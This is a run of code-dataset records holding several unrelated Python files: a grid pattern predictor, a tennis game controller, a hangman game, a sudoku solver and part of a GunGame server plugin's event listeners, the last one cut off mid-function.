out_)))\n # if len(scores) < 1:\n # return []\n # max_score = max([s for s, _ in scores])\n # if max_score > 1 and last_dx == 0 and last_dy == 0:\n # scores = [(s, _) for s, _ in scores if s > 1]\n # \n all_scores = cls.filter_paths(scores)\n if not recursive:\n return all_scores\n result = []\n \n for score, (p, i, o) in all_scores:\n x_, y_ = p.get_last_pos()\n continuations = cls.get_paths_from_point(\n i, o, x_, y_,\n last_dx=p.dx, last_dy=p.dy, \n stop_conditions=stop_conditions,\n kernel_size=kernel_size,\n debug=debug,\n recursive=True\n )\n #print(\"continuations\", x_, y_, len(continuations))\n if debug:\n print(\"continuation\", x_, y_, continuations)\n if len(continuations) == 0:\n result.append((score, (p, i, o)))\n else:\n for sc, (p_, i_, o_) in continuations:\n new_path = p.add_path(p_)\n result.append((new_path.score(), (new_path, i_, o_)))\n return result\n \n @classmethod\n def find_direction(cls, inp, out, stop_conditions=StopConditions(), kernel_size=1, debug=False,\n use_recursive_lines=True):\n all_scores = []\n for i in range(inp.shape[0]):\n for j in range(out.shape[1]):\n best_scores = cls.get_paths_from_point(\n inp, out, i, j, last_dx=0, last_dy=0,\n stop_conditions=stop_conditions, kernel_size=kernel_size,\n debug=debug, recursive=use_recursive_lines)\n res = cls.get_point_changes(inp, out, i, j, kernel_size=kernel_size)\n if res is not None:\n all_scores.append(res)\n best_scores = sorted(best_scores, key=lambda x:x[0], reverse=True)\n if len(best_scores) == 0:\n continue\n #print(best_scores)\n #max_score = best_scores[0][0]\n all_scores.extend(best_scores)#[x for x in best_scores if x[0] ==max_score])\n if len(all_scores) == 0:\n return None\n #all_scores = cls.filter_paths(all_scores)\n #all_scores = cls.filter_by_segments(all_scores)\n return sorted(all_scores, key=lambda x:x[0], reverse=True)\n \n @staticmethod\n def compare_recolored(a, b):\n ab = dict()\n ba = dict()\n for k, v in zip(a.flatten(), b.flatten()):\n if k in ab:\n return False\n else:\n ab[k] = v\n if v in ba:\n return False\n else:\n ba[v] = k\n return True\n\n @classmethod\n def get_path_from_pos(cls, inp_, path, sx, sy, kernel_size=1):\n i = inp_.copy()\n hwkernel = 2*kernel_size + 1\n start = tuple(i[sx : sx + hwkernel, sy : sy + hwkernel].flatten())\n path_start = tuple(path.start.flatten())\n #todo: add colorizer\n if path_start != start and not cls.compare_recolored(path.start, i[sx : sx + hwkernel, sy : sy + hwkernel]):\n #print(path_start, start)\n return None\n x = sx\n y = sy\n positions = []\n flat_moves = [tuple(m.flatten())for m in path.moves]\n for k in range(100):\n x += path.dx\n y += path.dy\n if x < 0 or y < 0 or x > i.shape[0] - hwkernel or y > i.shape[1] - hwkernel:\n break\n move = i[x:x + hwkernel, y:y + hwkernel]\n flat_move = tuple(move.flatten())\n if flat_move in flat_moves: #or move[1 + path.dx, 1 + path.dy] in [\n #m[1 + path.dx, 1 + path.dy] for m in path.moves]:\n positions.append((x, y))\n i[x + kernel_size, y + kernel_size] = 10\n #print(k, move, flat_moves)\n else:\n #print(k, move)#, flat_moves)\n break\n # check path.end\n x, y = ([(sx, sy)] + positions)[-1]\n end = tuple(i[x : x + hwkernel, y : y + hwkernel].flatten())\n path_end = tuple(path.end.flatten())\n if end != path_end:\n return None\n return positions\n\n @classmethod \n def apply_path(cls, inp_, paths, kernel_size=1):\n data = OrderedDict()\n ext = OrderedDict()\n hwkernel = 2 * kernel_size + 1\n for i in range(inp_.shape[0] - hwkernel):\n for j in range(inp_.shape[1] - hwkernel):\n key = tuple(inp_[i : i + hwkernel, j : j + hwkernel].flatten())\n ext[(i, j)] = inp_[i : i + hwkernel, j : j + hwkernel]\n if not key in data:\n data[key] = []\n data[key].append((i, j))\n #print(data)\n all_paths = set()\n for p in paths:\n start = (tuple(p.start.flatten()))\n if not start in data:\n continue\n for x, y in data[start]:\n start = inp_[x : x + hwkernel, y : y + hwkernel]\n res = cls.get_path_from_pos(inp_, p, x, y, kernel_size=kernel_size)\n if res is not None:\n all_paths.add((tuple(sorted(res)), p.colorizer.change_palette(start)))\n return all_paths\n\n @classmethod\n def apply_pathc(cls, inp_, paths, kernel_size=1):\n data = OrderedDict()\n ext = OrderedDict()\n hwkernel = 2 * kernel_size + 1\n for i in range(inp_.shape[0] - hwkernel):\n for j in range(inp_.shape[1] - hwkernel):\n key = tuple(inp_[i : i + hwkernel, j : j + hwkernel].flatten())\n ext[(i, j)] = inp_[i : i + hwkernel, j : j + hwkernel]\n if not key in data:\n data[key] = []\n data[key].append((i, j))\n #print(data)\n all_paths = set()\n for start in paths.collection:\n if not start in data:\n continue\n for p in paths.collection[start]:\n #print(start)\n for x, y in data[start]:\n start_ = inp_[x : x + hwkernel, y : y + hwkernel]\n res = cls.get_path_from_pos(inp_, p, x, y, kernel_size=kernel_size)\n #print(res)\n if res is not None:\n all_paths.add((tuple(sorted(res)), p.colorizer))#.change_palette(start_)))\n return all_paths\n\n @classmethod\n def validate(cls, paths, iodata_list, kernel_size=1):\n for iodata in iodata_list:\n i = iodata.input_field.data\n o = iodata.output_field.data\n inp_ = np.pad(i, kernel_size, constant_values=-1).copy()\n out_ = np.pad(o, kernel_size, constant_values=-1).copy()\n\n filled_paths = cls.apply_pathc(inp_, paths, kernel_size=kernel_size)\n #print(filled_paths)\n res = np.zeros(i.shape, dtype=int)\n for path, colorizer in filled_paths:\n for (x, y) in path:\n res[x, y] = 1\n if not np.all((o)*(1 - res)==i):\n return False\n return True\n\n @classmethod\n def predict(cls, paths, field, kernel_size=1):\n inp = field.data.copy()\n inp_ = np.pad(inp, kernel_size, constant_values=-1).copy()\n filled_paths = cls.apply_pathc(inp_, paths, kernel_size=kernel_size)\n #print(filled_paths)\n #res = #np.zeros(i.shape, dtype=int)\n for path, colorizer in filled_paths:\n for (x, y), c in zip(path, colorizer):\n inp[x, y] = c\n return inp\n\n @classmethod\n def extract_paths(cls, iodata_list, kernel_size=1, debug=False, use_recursive_lines=True):\n result = []\n for iodata in iodata_list:\n i = iodata.input_field.data\n o = iodata.output_field.data\n if debug:\n print(\"==\"*19)\n stop_conditions = StopConditions()\n res = cls.find_direction(i, o, kernel_size=kernel_size, debug=debug,\n use_recursive_lines=use_recursive_lines)\n #print(\"extract_\", res)\n if res is None:\n if debug:\n print(None)\n continue\n res = cls.filter_paths(res)\n for score, (path, inp_, out_) in res:\n result.append((score, (path, inp_, out_)))\n if debug:\n if score == 0:\n continue\n print(score)\n print(path)\n print(inp_)\n print(out_)\n return result\n\n @classmethod\n def make_path_collection(cls, iodata_list, kernel_size=1, debug=False, use_recursive_lines=True):\n result = cls.extract_paths(iodata_list, kernel_size=kernel_size,\n debug=debug, use_recursive_lines=use_recursive_lines)\n paths = [p for (score, (p, i, o)) in result]\n #print(paths)\n pc = PathCollection.build(paths)\n return pc\n\n\nclass PointConnectorPredictor(Predictor, AvailableAll):\n def __init__(self, multiplier=1, kernel_size=1, debug=False, use_recursive_lines=False):\n self.multiplier = multiplier\n self.kernel_size = 1\n self.debug = debug\n self.use_recursive_lines = use_recursive_lines\n\n def is_available(self, iodata_list):\n for k, iodata in enumerate(iodata_list):\n if iodata.input_field.shape != iodata.output_field.shape:\n return False\n self.path_collection = PointConnectorUtils.make_path_collection(\n iodata_list, kernel_size=self.kernel_size, debug=self.debug,\n use_recursive_lines=self.use_recursive_lines)\n if self.debug:\n print(self.path_collection)\n return PointConnectorUtils.validate(\n self.path_collection, iodata_list, kernel_size=self.kernel_size)\n \n def train(self, iodata_list):\n pass\n\n def predict(self, field):\n if isinstance(field, IOData):\n for v in self.predict(field.input_field):\n yield v\n return\n result = PointConnectorUtils.predict(self.path_collection, field,\n kernel_size=self.kernel_size)\n #while True:\n yield Field(result)\n\n def __str__(self):\n return f\"PointConnectorPredictor()\"\n","sub_path":"predictors/connector.py","file_name":"connector.py","file_ext":"py","file_size_in_byte":25186,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"365848283","text":"#*************************************************************************************\r\n#\r\n# FILENAME : Tennis_Controller.py\r\n#\r\n# SOURCE : Kata Task\r\n#\r\n# COPYRIGHT :(C) GW\r\n#\r\n#************************************************************************************\r\n#\r\n# DESCRIPTION:\r\n# \r\n#\tTennis_Controller.py is the entry point to the application.\r\n# The class Tennis_Application_Controller controls program flow taking requests from view classes, \r\n# populating models, and utilising service classes where applicable\r\n#\t\r\n#*************************************************************************************\r\n\r\n\r\n# Imports : \r\nfrom Tennis_View import View_Capability_Handler\r\nfrom Tennis_Model import Tennis_Player_Model\r\nfrom Tennis_Services import Tennis_Model_Services\r\n\r\n# Class controlling program flow\r\nclass Tennis_Application_Controller():\r\n\t\r\n\tdef __init__(self):\r\n\t\r\n\t\t# Init views\r\n\t\tself.view_capability_handler_instance = View_Capability_Handler(self)\r\n\t\t# Activate views\r\n\t\tself.view_capability_handler_instance.start_view()\r\n\t\t# Init services capabilities\r\n\t\tself.tennis_model_services_instance = Tennis_Model_Services()\r\n\t\t# Attribute to store all models created\r\n\t\tself.player_models_dictionary = {}\r\n\t\t\r\n\t# Method which acceses all views from handler and displays the requested view\r\n\tdef request_frame(self, cont):\r\n\t\t# Set attribute to new current view\r\n\t\tself.active_view = cont\r\n\t\t# Get requested view from handler\r\n\t\tframe = self.view_capability_handler_instance.get_all_views()[cont]\r\n\t\t# Make view \"active\"\r\n\t\tframe.tkraise()\r\n\t\r\n\t# Method which kills root object and thus all views\r\n\tdef request_view_termination(self):\r\n\t\tself.view_capability_handler_instance.get_view_root_object().quit()\r\n\t\r\n\t# Method which calls view to provide its data payload and populates the player models\r\n\tdef request_player_model_population(self, cont, main_tennis_view):\r\n\t\t# Get data payload\r\n\t\tpay_load = self.view_capability_handler_instance.get_all_views()[cont].get_view_payload()\r\n\t\t# For each player...\r\n\t\tfor index, player_name in enumerate(pay_load[\"player_name\"]):\r\n\t\t\t# Create and populate model\r\n\t\t\ttennis_player_model_instance = Tennis_Player_Model()\r\n\t\t\ttennis_player_model_instance.set_player_name(pay_load[\"player_name\"][index])\r\n\t\t\ttennis_player_model_instance.set_up_movement_key(pay_load[\"up_movement_key\"][index])\r\n\t\t\ttennis_player_model_instance.set_down_movement_key(pay_load[\"down_movement_key\"][index])\r\n\t\t\ttennis_player_model_instance.set_left_movement_key(pay_load[\"left_movement_key\"][index])\r\n\t\t\ttennis_player_model_instance.set_right_movement_key(pay_load[\"right_movement_key\"][index])\r\n\t\t\ttennis_player_model_instance.set_player_id(index)\r\n\t\t\ttennis_player_model_instance.set_player_color(pay_load[\"player_color\"][index])\r\n\t\t\t# Use service to check if model is indeed valid\r\n\t\t\tif(self.tennis_model_services_instance.validate_player_model(tennis_player_model_instance) == True):\r\n\t\t\t\t# Model valid assign to member attribute\r\n\t\t\t\tplayer_model_dictionary_element = {pay_load[\"player_name\"][index] : tennis_player_model_instance}\r\n\t\t\t\tself.player_models_dictionary.update(player_model_dictionary_element)\r\n\t\t\telse:\r\n\t\t\t\t# Model invalid display error to user and exit method\r\n\t\t\t\tself.view_capability_handler_instance.ammend_error_to_frame(cont, self.tennis_model_services_instance.return_error_message())\r\n\t\t\t\treturn\r\n\t\t# Valid model show next frame\r\n\t\tself.request_frame(main_tennis_view)\r\n\t\t# Create player on next frame\r\n\t\tself.player_creation(cont, main_tennis_view)\r\n\t\r\n\t# Method which creates player on canvas\r\n\tdef player_creation(self, cont, main_tennis_view):\r\n\t\tfor index, player_model in enumerate(self.player_models_dictionary.keys()):\r\n\t\t\tself.player_models_dictionary[player_model].set_player_view_object(self.view_capability_handler_instance.get_all_views()[main_tennis_view].create_player(\\\r\n\t\t\tself.player_models_dictionary[player_model].get_player_name(), index, \\\r\n\t\t\tself.player_models_dictionary[player_model].get_player_color()))\r\n\t\t\tself.view_capability_handler_instance.get_all_views()[main_tennis_view].set_player_starting_positions(index)\r\n\t\r\n\t# Method which returns the view player object identified by key press\t\r\n\tdef request_player_object(self, pressed_key):\r\n\t\tfor player_name in self.player_models_dictionary.keys():\r\n\t\t\tplayer_model_object = self.player_models_dictionary[player_name]\r\n\t\t\tplayer_movement_keys = player_model_object.get_player_keys_string()\r\n\t\t\tif pressed_key in player_movement_keys:\r\n\t\t\t\treturn player_model_object\r\n\t\treturn None\r\n\t\r\n\t# Method called when a player scores a point - steps through tennis point scoring logic \r\n\tdef request_player_score(self, player_id):\r\n\t\tscoring_player_score = 0\r\n\t\tconceeding_player_score = 0\r\n\t\tscoring_player_object = None\r\n\t\t# For each player\r\n\t\tfor player_name in self.player_models_dictionary.keys():\r\n\t\t\tplayer_model_object = self.player_models_dictionary[player_name]\r\n\t\t\tplayer_model_id = player_model_object.get_player_id()\r\n\t\t\t# If the id is the same as the id of the scoring player\r\n\t\t\tif player_id == player_model_id:\r\n\t\t\t\t# assign player score and object\r\n\t\t\t\tscoring_player_score = player_model_object.get_player_score()\r\n\t\t\t\tscoring_player_object = player_model_object\r\n\t\t\telse:\r\n\t\t\t\t# Else id is of the conceeding player assing their value\r\n\t\t\t\tconceeding_player_score = player_model_object.get_player_score()\r\n\t\t# Call service method to apply tennis scoring logic \r\n\t\tplayer_score = self.tennis_model_services_instance.determine_score_value(scoring_player_score, conceeding_player_score)\r\n\t\t# Player score is within bounds there is no \"winner\" yet so set scoring players ammended score\r\n\t\tif player_score is not None:\r\n\t\t\tscoring_player_object.set_player_score(player_score)\r\n\t\telse:\r\n\t\t\t# Kill screen game end\r\n\t\t\tself.request_view_termination()\r\n\t\t\r\n\t\t\t\r\n# Start application\t\t\r\nTennis_Application_Controller()","sub_path":"Tennis_Controller.py","file_name":"Tennis_Controller.py","file_ext":"py","file_size_in_byte":5903,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"419657408","text":"# Program that simulates a game of hangman\r\n\r\nimport random\r\nimport re\r\n\r\n\r\ndef read_file():\r\n with open(\"words_alpha.txt\", \"r\") as file: # Read in dictionary of words\r\n dictionary = [line.strip() for line in file]\r\n return dictionary\r\n\r\n\r\n# pick_word fcn\r\ndef pick_word(dictionary):\r\n \"\"\"This function uses a dictionary text file to pick the word to guess\"\"\"\r\n word = \"\"\r\n while len(word) < 4: # we want a word that is 4 letters or longer\r\n word = random.choice(dictionary)\r\n return word.lower()\r\n\r\n# Prints board and guessed letters\r\ndef print_board():\r\n print(output)\r\n print(\"The letters guessed so far are: \", guessed_letters)\r\n print(\" \")\r\n\r\n# Picks a word from the dictionary for user to guess\r\ndef get_word(dictionary):\r\n word = pick_word(dictionary)\r\n letters = list(word)\r\n output = []\r\n for i in range(len(word)):\r\n output.append('_')\r\n return word, letters, output\r\n\r\ndef get_indexes(count, letters, guess):\r\n indexes = []\r\n for x in range(count):\r\n if len(indexes) == 0:\r\n indexes.append(letters.index(guess))\r\n else:\r\n indexes.append(letters.index(guess, letters.index(guess) + x))\r\n return indexes\r\n\r\n\r\nif __name__ == \"__main__\":\r\n guessed_letters = [] # Declare vars\r\n wrong_left = 10\r\n word, letters, output = get_word(read_file())\r\n print(\"The word to guess is\", len(word), \"letters long. If you guess 10 incorrect letters, you lose.\")\r\n print(output) # Print word details\r\n\r\n # Run game loop\r\n while wrong_left != 0:\r\n guess = input(\"Please guess a letter or type 'quit' to exit game: \").lower()\r\n if guess == 'quit':\r\n print(\"Better luck next time!\")\r\n break\r\n if guessed_letters.count(guess) > 0:\r\n print(\"You already guessed that letter!\")\r\n continue\r\n count = letters.count(guess)\r\n if count == 0 and guess != \" \":\r\n wrong_left -= 1\r\n indexes = get_indexes(count, letters, guess)\r\n print(\"There is\", count, guess, \"- You have\", wrong_left, \"guesses before you lose.\")\r\n if output.count('_') == 0:\r\n print(\"Congrats!! You found the word!\", output)\r\n correct = True\r\n break\r\n for n in range(len(indexes)):\r\n output[indexes[n - 1]] = letters[indexes[n - 1]]\r\n guessed_letters.append(guess)\r\n print_board()\r\n print(\"The word was\", word)","sub_path":"hangman.py","file_name":"hangman.py","file_ext":"py","file_size_in_byte":2464,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"300022028","text":"class Solution:\r\n def solveSudoku(self, board):\r\n \"\"\"\r\n 解数独,每个数字在每行每列以及每个3*3的方框中只能出现一次\r\n :param board: 给定数独\r\n :return:\r\n \"\"\"\r\n # 行数字计数 row_count[i][j]表示i行的数字j + 1出现的次数\r\n row_count = [[0 for j in range(0, 9)] for i in range(0, 9)]\r\n # 列数字计数 col_count[i][j]表示i列的数字j + 1出现的次数\r\n col_count = [[0 for j in range(0, 9)] for i in range(0, 9)]\r\n # 小矩阵中数字出现的次数 matrix_count[i][j]表示i个矩阵中的数字j + 1出现的次数\r\n matrix_count = [[0 for j in range(0, 9)] for i in range(0, 9)]\r\n\r\n # 需要填充的位置\r\n fill_loc = []\r\n\r\n # 查找出所有需要填充的位置和已经填充的数字\r\n for i in range(0, 9):\r\n for j in range(0, 9):\r\n if board[i][j] != \".\":\r\n # 计算所在小矩阵位置\r\n m_index = (i // 3) * 3 + (j // 3)\r\n # 计数\r\n row_count[i][int(board[i][j]) - 1] += 1\r\n col_count[j][int(board[i][j]) - 1] += 1\r\n matrix_count[m_index][int(board[i][j]) - 1] += 1\r\n else:\r\n # 统计需要填充位置\r\n fill_loc.append([i, j])\r\n\r\n # 问题解决标志\r\n flag = [False]\r\n\r\n def _fill(fill_loc_index):\r\n \"\"\"\r\n 填充\r\n :param fill_loc_index:需要填充位置的索引\r\n :return:\r\n \"\"\"\r\n # 所有位置填充完毕\r\n if fill_loc_index >= len(fill_loc) or flag[0]:\r\n flag[0] = True\r\n return\r\n\r\n # 1-9依次填充\r\n for num in range(1, 10):\r\n # 计算小矩阵的索引\r\n m_index = (fill_loc[fill_loc_index][0] // 3) * 3 + (fill_loc[fill_loc_index][1] // 3)\r\n # 判断数字填充进入之后不符合条件\r\n if row_count[fill_loc[fill_loc_index][0]][num - 1] != 0 or \\\r\n col_count[fill_loc[fill_loc_index][1]][num - 1] != 0 or \\\r\n matrix_count[m_index][num - 1] != 0:\r\n continue\r\n\r\n # 填充\r\n board[fill_loc[fill_loc_index][0]][fill_loc[fill_loc_index][1]] = str(num)\r\n # 添加计数\r\n row_count[fill_loc[fill_loc_index][0]][num - 1] += 1\r\n col_count[fill_loc[fill_loc_index][1]][num - 1] += 1\r\n matrix_count[m_index][num - 1] += 1\r\n # 填充下一个位置\r\n _fill(fill_loc_index + 1)\r\n\r\n # 如果问题未解决就还原\r\n if flag[0] is False:\r\n # 填充还原\r\n board[fill_loc[fill_loc_index][0]][fill_loc[fill_loc_index][1]] = \".\"\r\n # 计数还原\r\n row_count[fill_loc[fill_loc_index][0]][num - 1] -= 1\r\n col_count[fill_loc[fill_loc_index][1]][num - 1] -= 1\r\n matrix_count[m_index][num - 1] -= 1\r\n # 解决了就跳出\r\n else:\r\n break\r\n\r\n # 从第一个位置开始填充\r\n _fill(0)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n board = [[\"5\", \"3\", \".\", \".\", \"7\", \".\", \".\", \".\", \".\"],\r\n [\"6\", \".\", \".\", \"1\", \"9\", \"5\", \".\", \".\", \".\"],\r\n [\".\", \"9\", \"8\", \".\", \".\", \".\", \".\", \"6\", \".\"],\r\n [\"8\", \".\", \".\", \".\", \"6\", \".\", \".\", \".\", \"3\"],\r\n [\"4\", \".\", \".\", \"8\", \".\", \"3\", \".\", \".\", \"1\"],\r\n [\"7\", \".\", \".\", \".\", \"2\", \".\", \".\", \".\", \"6\"],\r\n [\".\", \"6\", \".\", \".\", \".\", \".\", \"2\", \"8\", \".\"],\r\n [\".\", \".\", \".\", \"4\", \"1\", \"9\", \".\", \".\", \"5\"],\r\n [\".\", \".\", \".\", \".\", \"8\", \".\", \".\", \"7\", \"9\"]]\r\n\r\n Solution().solveSudoku(board)\r\n\r\n for row in board:\r\n print(row)\r\n","sub_path":"LeetCode_Python/Test_37_solveSudoku.py","file_name":"Test_37_solveSudoku.py","file_ext":"py","file_size_in_byte":4009,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"209732611","text":"# ../gungame/core/listeners.py\n\n\"\"\"Event and level listeners and misc helper functions.\"\"\"\n\n# =============================================================================\n# >> IMPORTS\n# =============================================================================\n# Source.Python\nfrom colors import BLUE, RED, WHITE\nfrom cvars import ConVar\nfrom entities.entity import Entity\nfrom events import Event\nfrom filters.entities import EntityIter\nfrom listeners import OnLevelInit, OnLevelShutdown\nfrom listeners.tick import Delay\nfrom weapons.manager import weapon_manager\n\n# GunGame\nfrom .config.misc import (\n allow_kills_after_round, cancel_on_fire, dynamic_chat_time, give_armor,\n give_defusers, level_on_protect,\n)\nfrom .config.punishment import (\n level_one_team_kill, suicide_punish, team_kill_punish,\n)\nfrom .config.warmup import enabled as warmup_enabled, weapon as warmup_weapon\nfrom .config.weapon import (\n order_file, order_randomize, multi_kill_override, prop_physics\n)\nfrom .credits import gungame_credits\nfrom .events.included.match import GG_Start\nfrom .leaders import leader_manager\nfrom .messages import message_manager\nfrom .players.attributes import AttributePostHook\nfrom .players.dictionary import player_dictionary\nfrom .sounds.manager import sound_manager\nfrom .status import GunGameMatchStatus, GunGameRoundStatus, GunGameStatus\nfrom .warmup import warmup_manager\nfrom .weapons.manager import weapon_order_manager\n\n\n# =============================================================================\n# >> ALL DECLARATION\n# =============================================================================\n__all__ = (\n 'start_match',\n)\n\n\n# =============================================================================\n# >> GLOBAL VARIABLES\n# =============================================================================\n# Create a set to store userids that have already had join messages\n_joined_players = set()\n\n# Create a set to store userids that have recently switched teams\n_team_changers = set()\n\n\n# =============================================================================\n# >> PLAYER GAME EVENTS\n# =============================================================================\n@Event('player_spawn')\ndef _player_spawn(game_event):\n \"\"\"Give the player their level weapon.\"\"\"\n # Is GunGame active?\n if GunGameStatus.MATCH is not GunGameMatchStatus.ACTIVE:\n return\n\n # Use try/except to get the player's instance\n try:\n player = player_dictionary[game_event['userid']]\n except ValueError:\n return\n\n # Verify that the player is on a team\n if player.team < 2:\n return\n\n # Spawn protection\n player.give_spawn_protection()\n\n # Give the player their new weapon\n player.strip_weapons()\n player.give_level_weapon()\n\n # Give CTs defusers, if need be\n if player.team == 3 and give_defusers.get_bool():\n player.has_defuser = True\n\n # Give player armor, if necessary\n armor_type = {1: 'kevlar', 2: 'assaultsuit'}.get(give_armor.get_int())\n if armor_type is not None:\n equip = Entity.find_or_create('game_player_equip')\n equip.add_output(\n 'item_{armor_type} 1'.format(\n armor_type=armor_type\n ),\n caller=player,\n activator=player,\n )\n\n # Skip bots\n if player.is_fake_client():\n return\n\n # Send the player their level information\n _send_level_info(player)\n\n\n@Event('player_death')\ndef _player_death(game_event):\n \"\"\"Award the killer with a multi-kill increase or level increase.\"\"\"\n # Is GunGame active?\n if GunGameStatus.MATCH is not GunGameMatchStatus.ACTIVE:\n return\n\n # Is the round active or should kills after the round count?\n if (\n GunGameStatus.ROUND is GunGameRoundStatus.INACTIVE and\n not allow_kills_after_round.get_int()\n ):\n return\n\n # Get the victim\n userid = game_event['userid']\n\n # Get the attacker\n attacker = game_event['attacker']\n\n # Was this a suicide?\n if attacker in (userid, 0):\n _punish_suicide(userid)\n return\n\n # Get the victim's instance\n victim = player_dictionary[userid]\n\n # Get the attacker's instance\n killer = player_dictionary[attacker]\n\n # Was this a team-kill?\n if victim.team == killer.team:\n _punish_team_kill(killer)\n return\n\n if killer.in_spawn_protection and not level_on_protect.get_int():\n return\n\n # Did the killer kill using their level's weapon?\n weapon = game_event['weapon']\n if weapon != 'prop_physics':\n if weapon_manager[weapon].basename != killer.level_weapon:\n return\n elif not prop_physics.get_int():\n return\n\n # Increase the killer's multi_kill\n killer.multi_kill += 1\n\n # Does the player need leveled up?\n if killer.multi_kill < killer.level_multi_kill:\n\n # If not, no need to go further\n return\n\n # Level the player up\n killer.increase_level(\n levels=1,\n reason='kill',\n victim=userid,\n )\n\n\n@Event('player_activate')\ndef _player_activate(game_event):\n \"\"\"Add player to leaders and send join message.\"\"\"\n # Get the player's userid\n userid = game_event['userid']\n\n # Add the player to the leader dictionary\n leader_manager.add_player(userid)\n\n # Is the player just joining the game?\n if userid in _joined_players:\n return\n\n # Add the userid to the joined players set\n _joined_players.add(userid)\n\n # Get the player's instance\n player = player_dictionary[userid]\n\n # Is the player a bot?\n if player.is_fake_client():\n return\n\n if player.wins:\n message = 'Player:Join:Ranked' if player.rank else 'Player:Join:Wins'\n message_manager.chat_message(message, player=player)\n\n # Print a message if the joining player is in the credits\n for credit_type in gungame_credits:\n for name in gungame_credits[credit_type]:\n steam_id2 = gungame_credits[credit_type][name]['steam_id2']\n steam_id3 = gungame_credits[credit_type][name]['steam_id3']\n if player.steamid in (steam_id2, steam_id3):\n message_manager.chat_message(\n 'Player:Join:Credits',\n player=player,\n credit_type=credit_type,\n )\n return\n\n\n@Event('player_disconnect')\ndef _player_disconnect(game_event):\n \"\"\"Store the disconnecting player's values and remove from dictionary.\"\"\"\n userid = game_event['userid']\n player_dictionary.safe_remove(userid)\n leader_manager.check_disconnect(userid)\n\n\n@Event('player_team')\ndef _player_team(game_event):\n userid = game_event['userid']\n if userid in _team_changers:\n return\n _team_changers.add(userid)\n Delay(0.2, _team_changers.remove, (userid, ))\n\n\n@Event('weapon_fire')\ndef _weapon_fire(game_event):\n if not cancel_on_fire.get_int():\n return\n player = player_dictionary[game_event['userid']]\n if not player.in_spawn_protection:\n return\n if cancel_on_fire.get_int():\n player.remove_spawn_protection()\n\n\n# =============================================================================\n# >> ROUND GAME EVENTS\n# =============================================================================\n@Event('round_start')\ndef _round_start(game_event):\n \"\"\"Disable buyzones and set the round status to ACTIVE.\"\"\"\n GunGameStatus.ROUND = GunGameRoundStatus.ACTIVE\n for entity in EntityIter('func_buyzone'):\n entity.disable()\n\n\n@Event('round_end')\ndef _round_end(game_event):\n \"\"\"Set the round status to INACTIVE since the round ended.\"\"\"\n GunGameStatus.ROUND = GunGameRoundStatus.INACTIVE\n\n\n# =============================================================================\n# >> MISC GAME EVENTS\n# =============================================================================\n@Event('server_cvar')\ndef _server_cvar(game_event):\n \"\"\"Set the weapon order value if the ConVar is for the weapon order.\"\"\"\n if GunGameStatus.MATCH == GunGameMatchStatus.UNLOADING:\n return\n\n # Get the ConVar name and its new value\n cvarname = game_event['cvarname']\n cvarvalue = game_event['cvarvalue']\n\n # Did the weapon order change?\n if cvarname == order_file.name:\n\n # Set the new weapon order\n weapon_order_manager.set_active_weapon_order(cvarvalue)\n\n # Did the randomize value change?\n elif cvarname == order_randomize.name:\n\n # Set the randomize value\n weapon_order_manager.set_randomize(cvarvalue)\n\n # Did the multi_kill override value change?\n elif cvarname == multi_kill_override.name:\n\n # Print out the new weapon order\n weapon_order_manager.print_order()\n\n # Did the warmup weapon change?\n elif cvarname == warmup_weapon.name:\n\n # Set the new warmup weapon\n warmup_manager.set_warmup_weapon()\n\n\n# =============================================================================\n# >> GUNGAME EVENTS\n# =============================================================================\n@Event('gg_win')\ndef _gg_win(game_event):\n \"\"\"Increase the win total for the winner and end the map.\"\"\"\n # Set the match status\n GunGameStatus.MATCH = GunGameMatchStatus.POST\n\n # Get the winner\n winner = player_dictionary[game_event['winner']]\n\n # Increase the winner's win total if they are not a bot\n if not winner.is_fake_client():\n winner.wins += 1\n\n # Send the winner messages\n message_manager.chat_message(\n message='Winner:Long',\n index=winner.index,\n winner=winner.name,\n )\n for second in range(4):\n Delay(\n second,\n message_manager.center_message,\n kwargs={\n 'message': 'Winner:Short',\n 'winner': winner.name,\n }\n )\n color = {2: RED, 3: BLUE}.get(winner.team, WHITE)\n message_manager.top_message(\n message='Winner:Short',\n color=color,\n winner=winner.name\n )\n\n # Play the winner sound\n winner_sound = sound_manager.play_sound('winner')\n\n # Set the dynamic chat time, if needed\n if dynamic_chat_time.get_bool():\n ConVar('mp_chattime').set_float(winner_sound.duration)\n\n # End the match to move to the next map\n entity = Entity.find_or_create('game_end')\n entity.end_game()\n\n\n@Event('gg_map_end')\ndef _gg_map_end(game_event):\n \"\"\"Set the match status to POST after the map has ended.\"\"\"\n GunGameStatus.MATCH = GunGameMatchStatus.POST\n\n\n@Event('gg_start')\ndef _gg_start(game_event):\n \"\"\"Set the match status to ACTIVE and post the weapon order.\"\"\"\n # Set the match status\n GunGameStatus.MATCH = GunGameMatchStatus.ACTIVE\n\n # Post the weapon order\n weapon_order_manager.print_order()\n\n\n@Event('gg_level_up')\ndef _gg_level_up(game_event):\n \"\"\"Increase the player leader level and send level info.\"\"\"\n userid = game_event['leveler']\n leader_manager.player_level_up(userid)\n player = player_dictionary[userid]\n player.play_sound('level_up')\n _send_level_info(player)\n\n\n@Event('gg_level_down')\ndef _gg_level_down(game_event):\n \"\"\"Set the player's level in the leader dictionary.\"\"\"\n userid = game_event['leveler']\n leader_manager.player_level_down(userid)\n player_dictionary[userid].play_sound('level_down')\n\n\n# =============================================================================\n# >> LEVEL LISTENERS\n# =============================================================================\n@OnLevelInit\ndef _level_init(map_name):\n \"\"\"Set match status to INACTIVE when a new map is started.\"\"\"\n # Is GunGame still loading?\n if GunGameStatus.MATCH is GunGameMatchStatus.LOADING:\n return\n\n # Set the match status\n GunGameStatus.MATCH = GunGameMatchStatus.INACTIVE\n\n # Start match (or warmup)\n start_match()\n\n\n@OnLevelShutdown\ndef _level_shutdown():\n \"\"\"Clear the player dictionary on map change.\"\"\"\n player_dictionary.clear()\n\n\n# =============================================================================\n# >> ATTRIBUTE LISTENERS\n# =============================================================================\n@AttributePostHook('multi_kill')\ndef _post_multi_kill(player, attribute, new_value, old_value):\n \"\"\"Send multi_kill info message.\"\"\"\n # Is the multi_kill being reset to 0?\n if not new_value:\n return\n\n # Is the player going to level up?\n multi_kill = player.level_multi_kill\n if multi_kill == new_value:\n return\n\n # 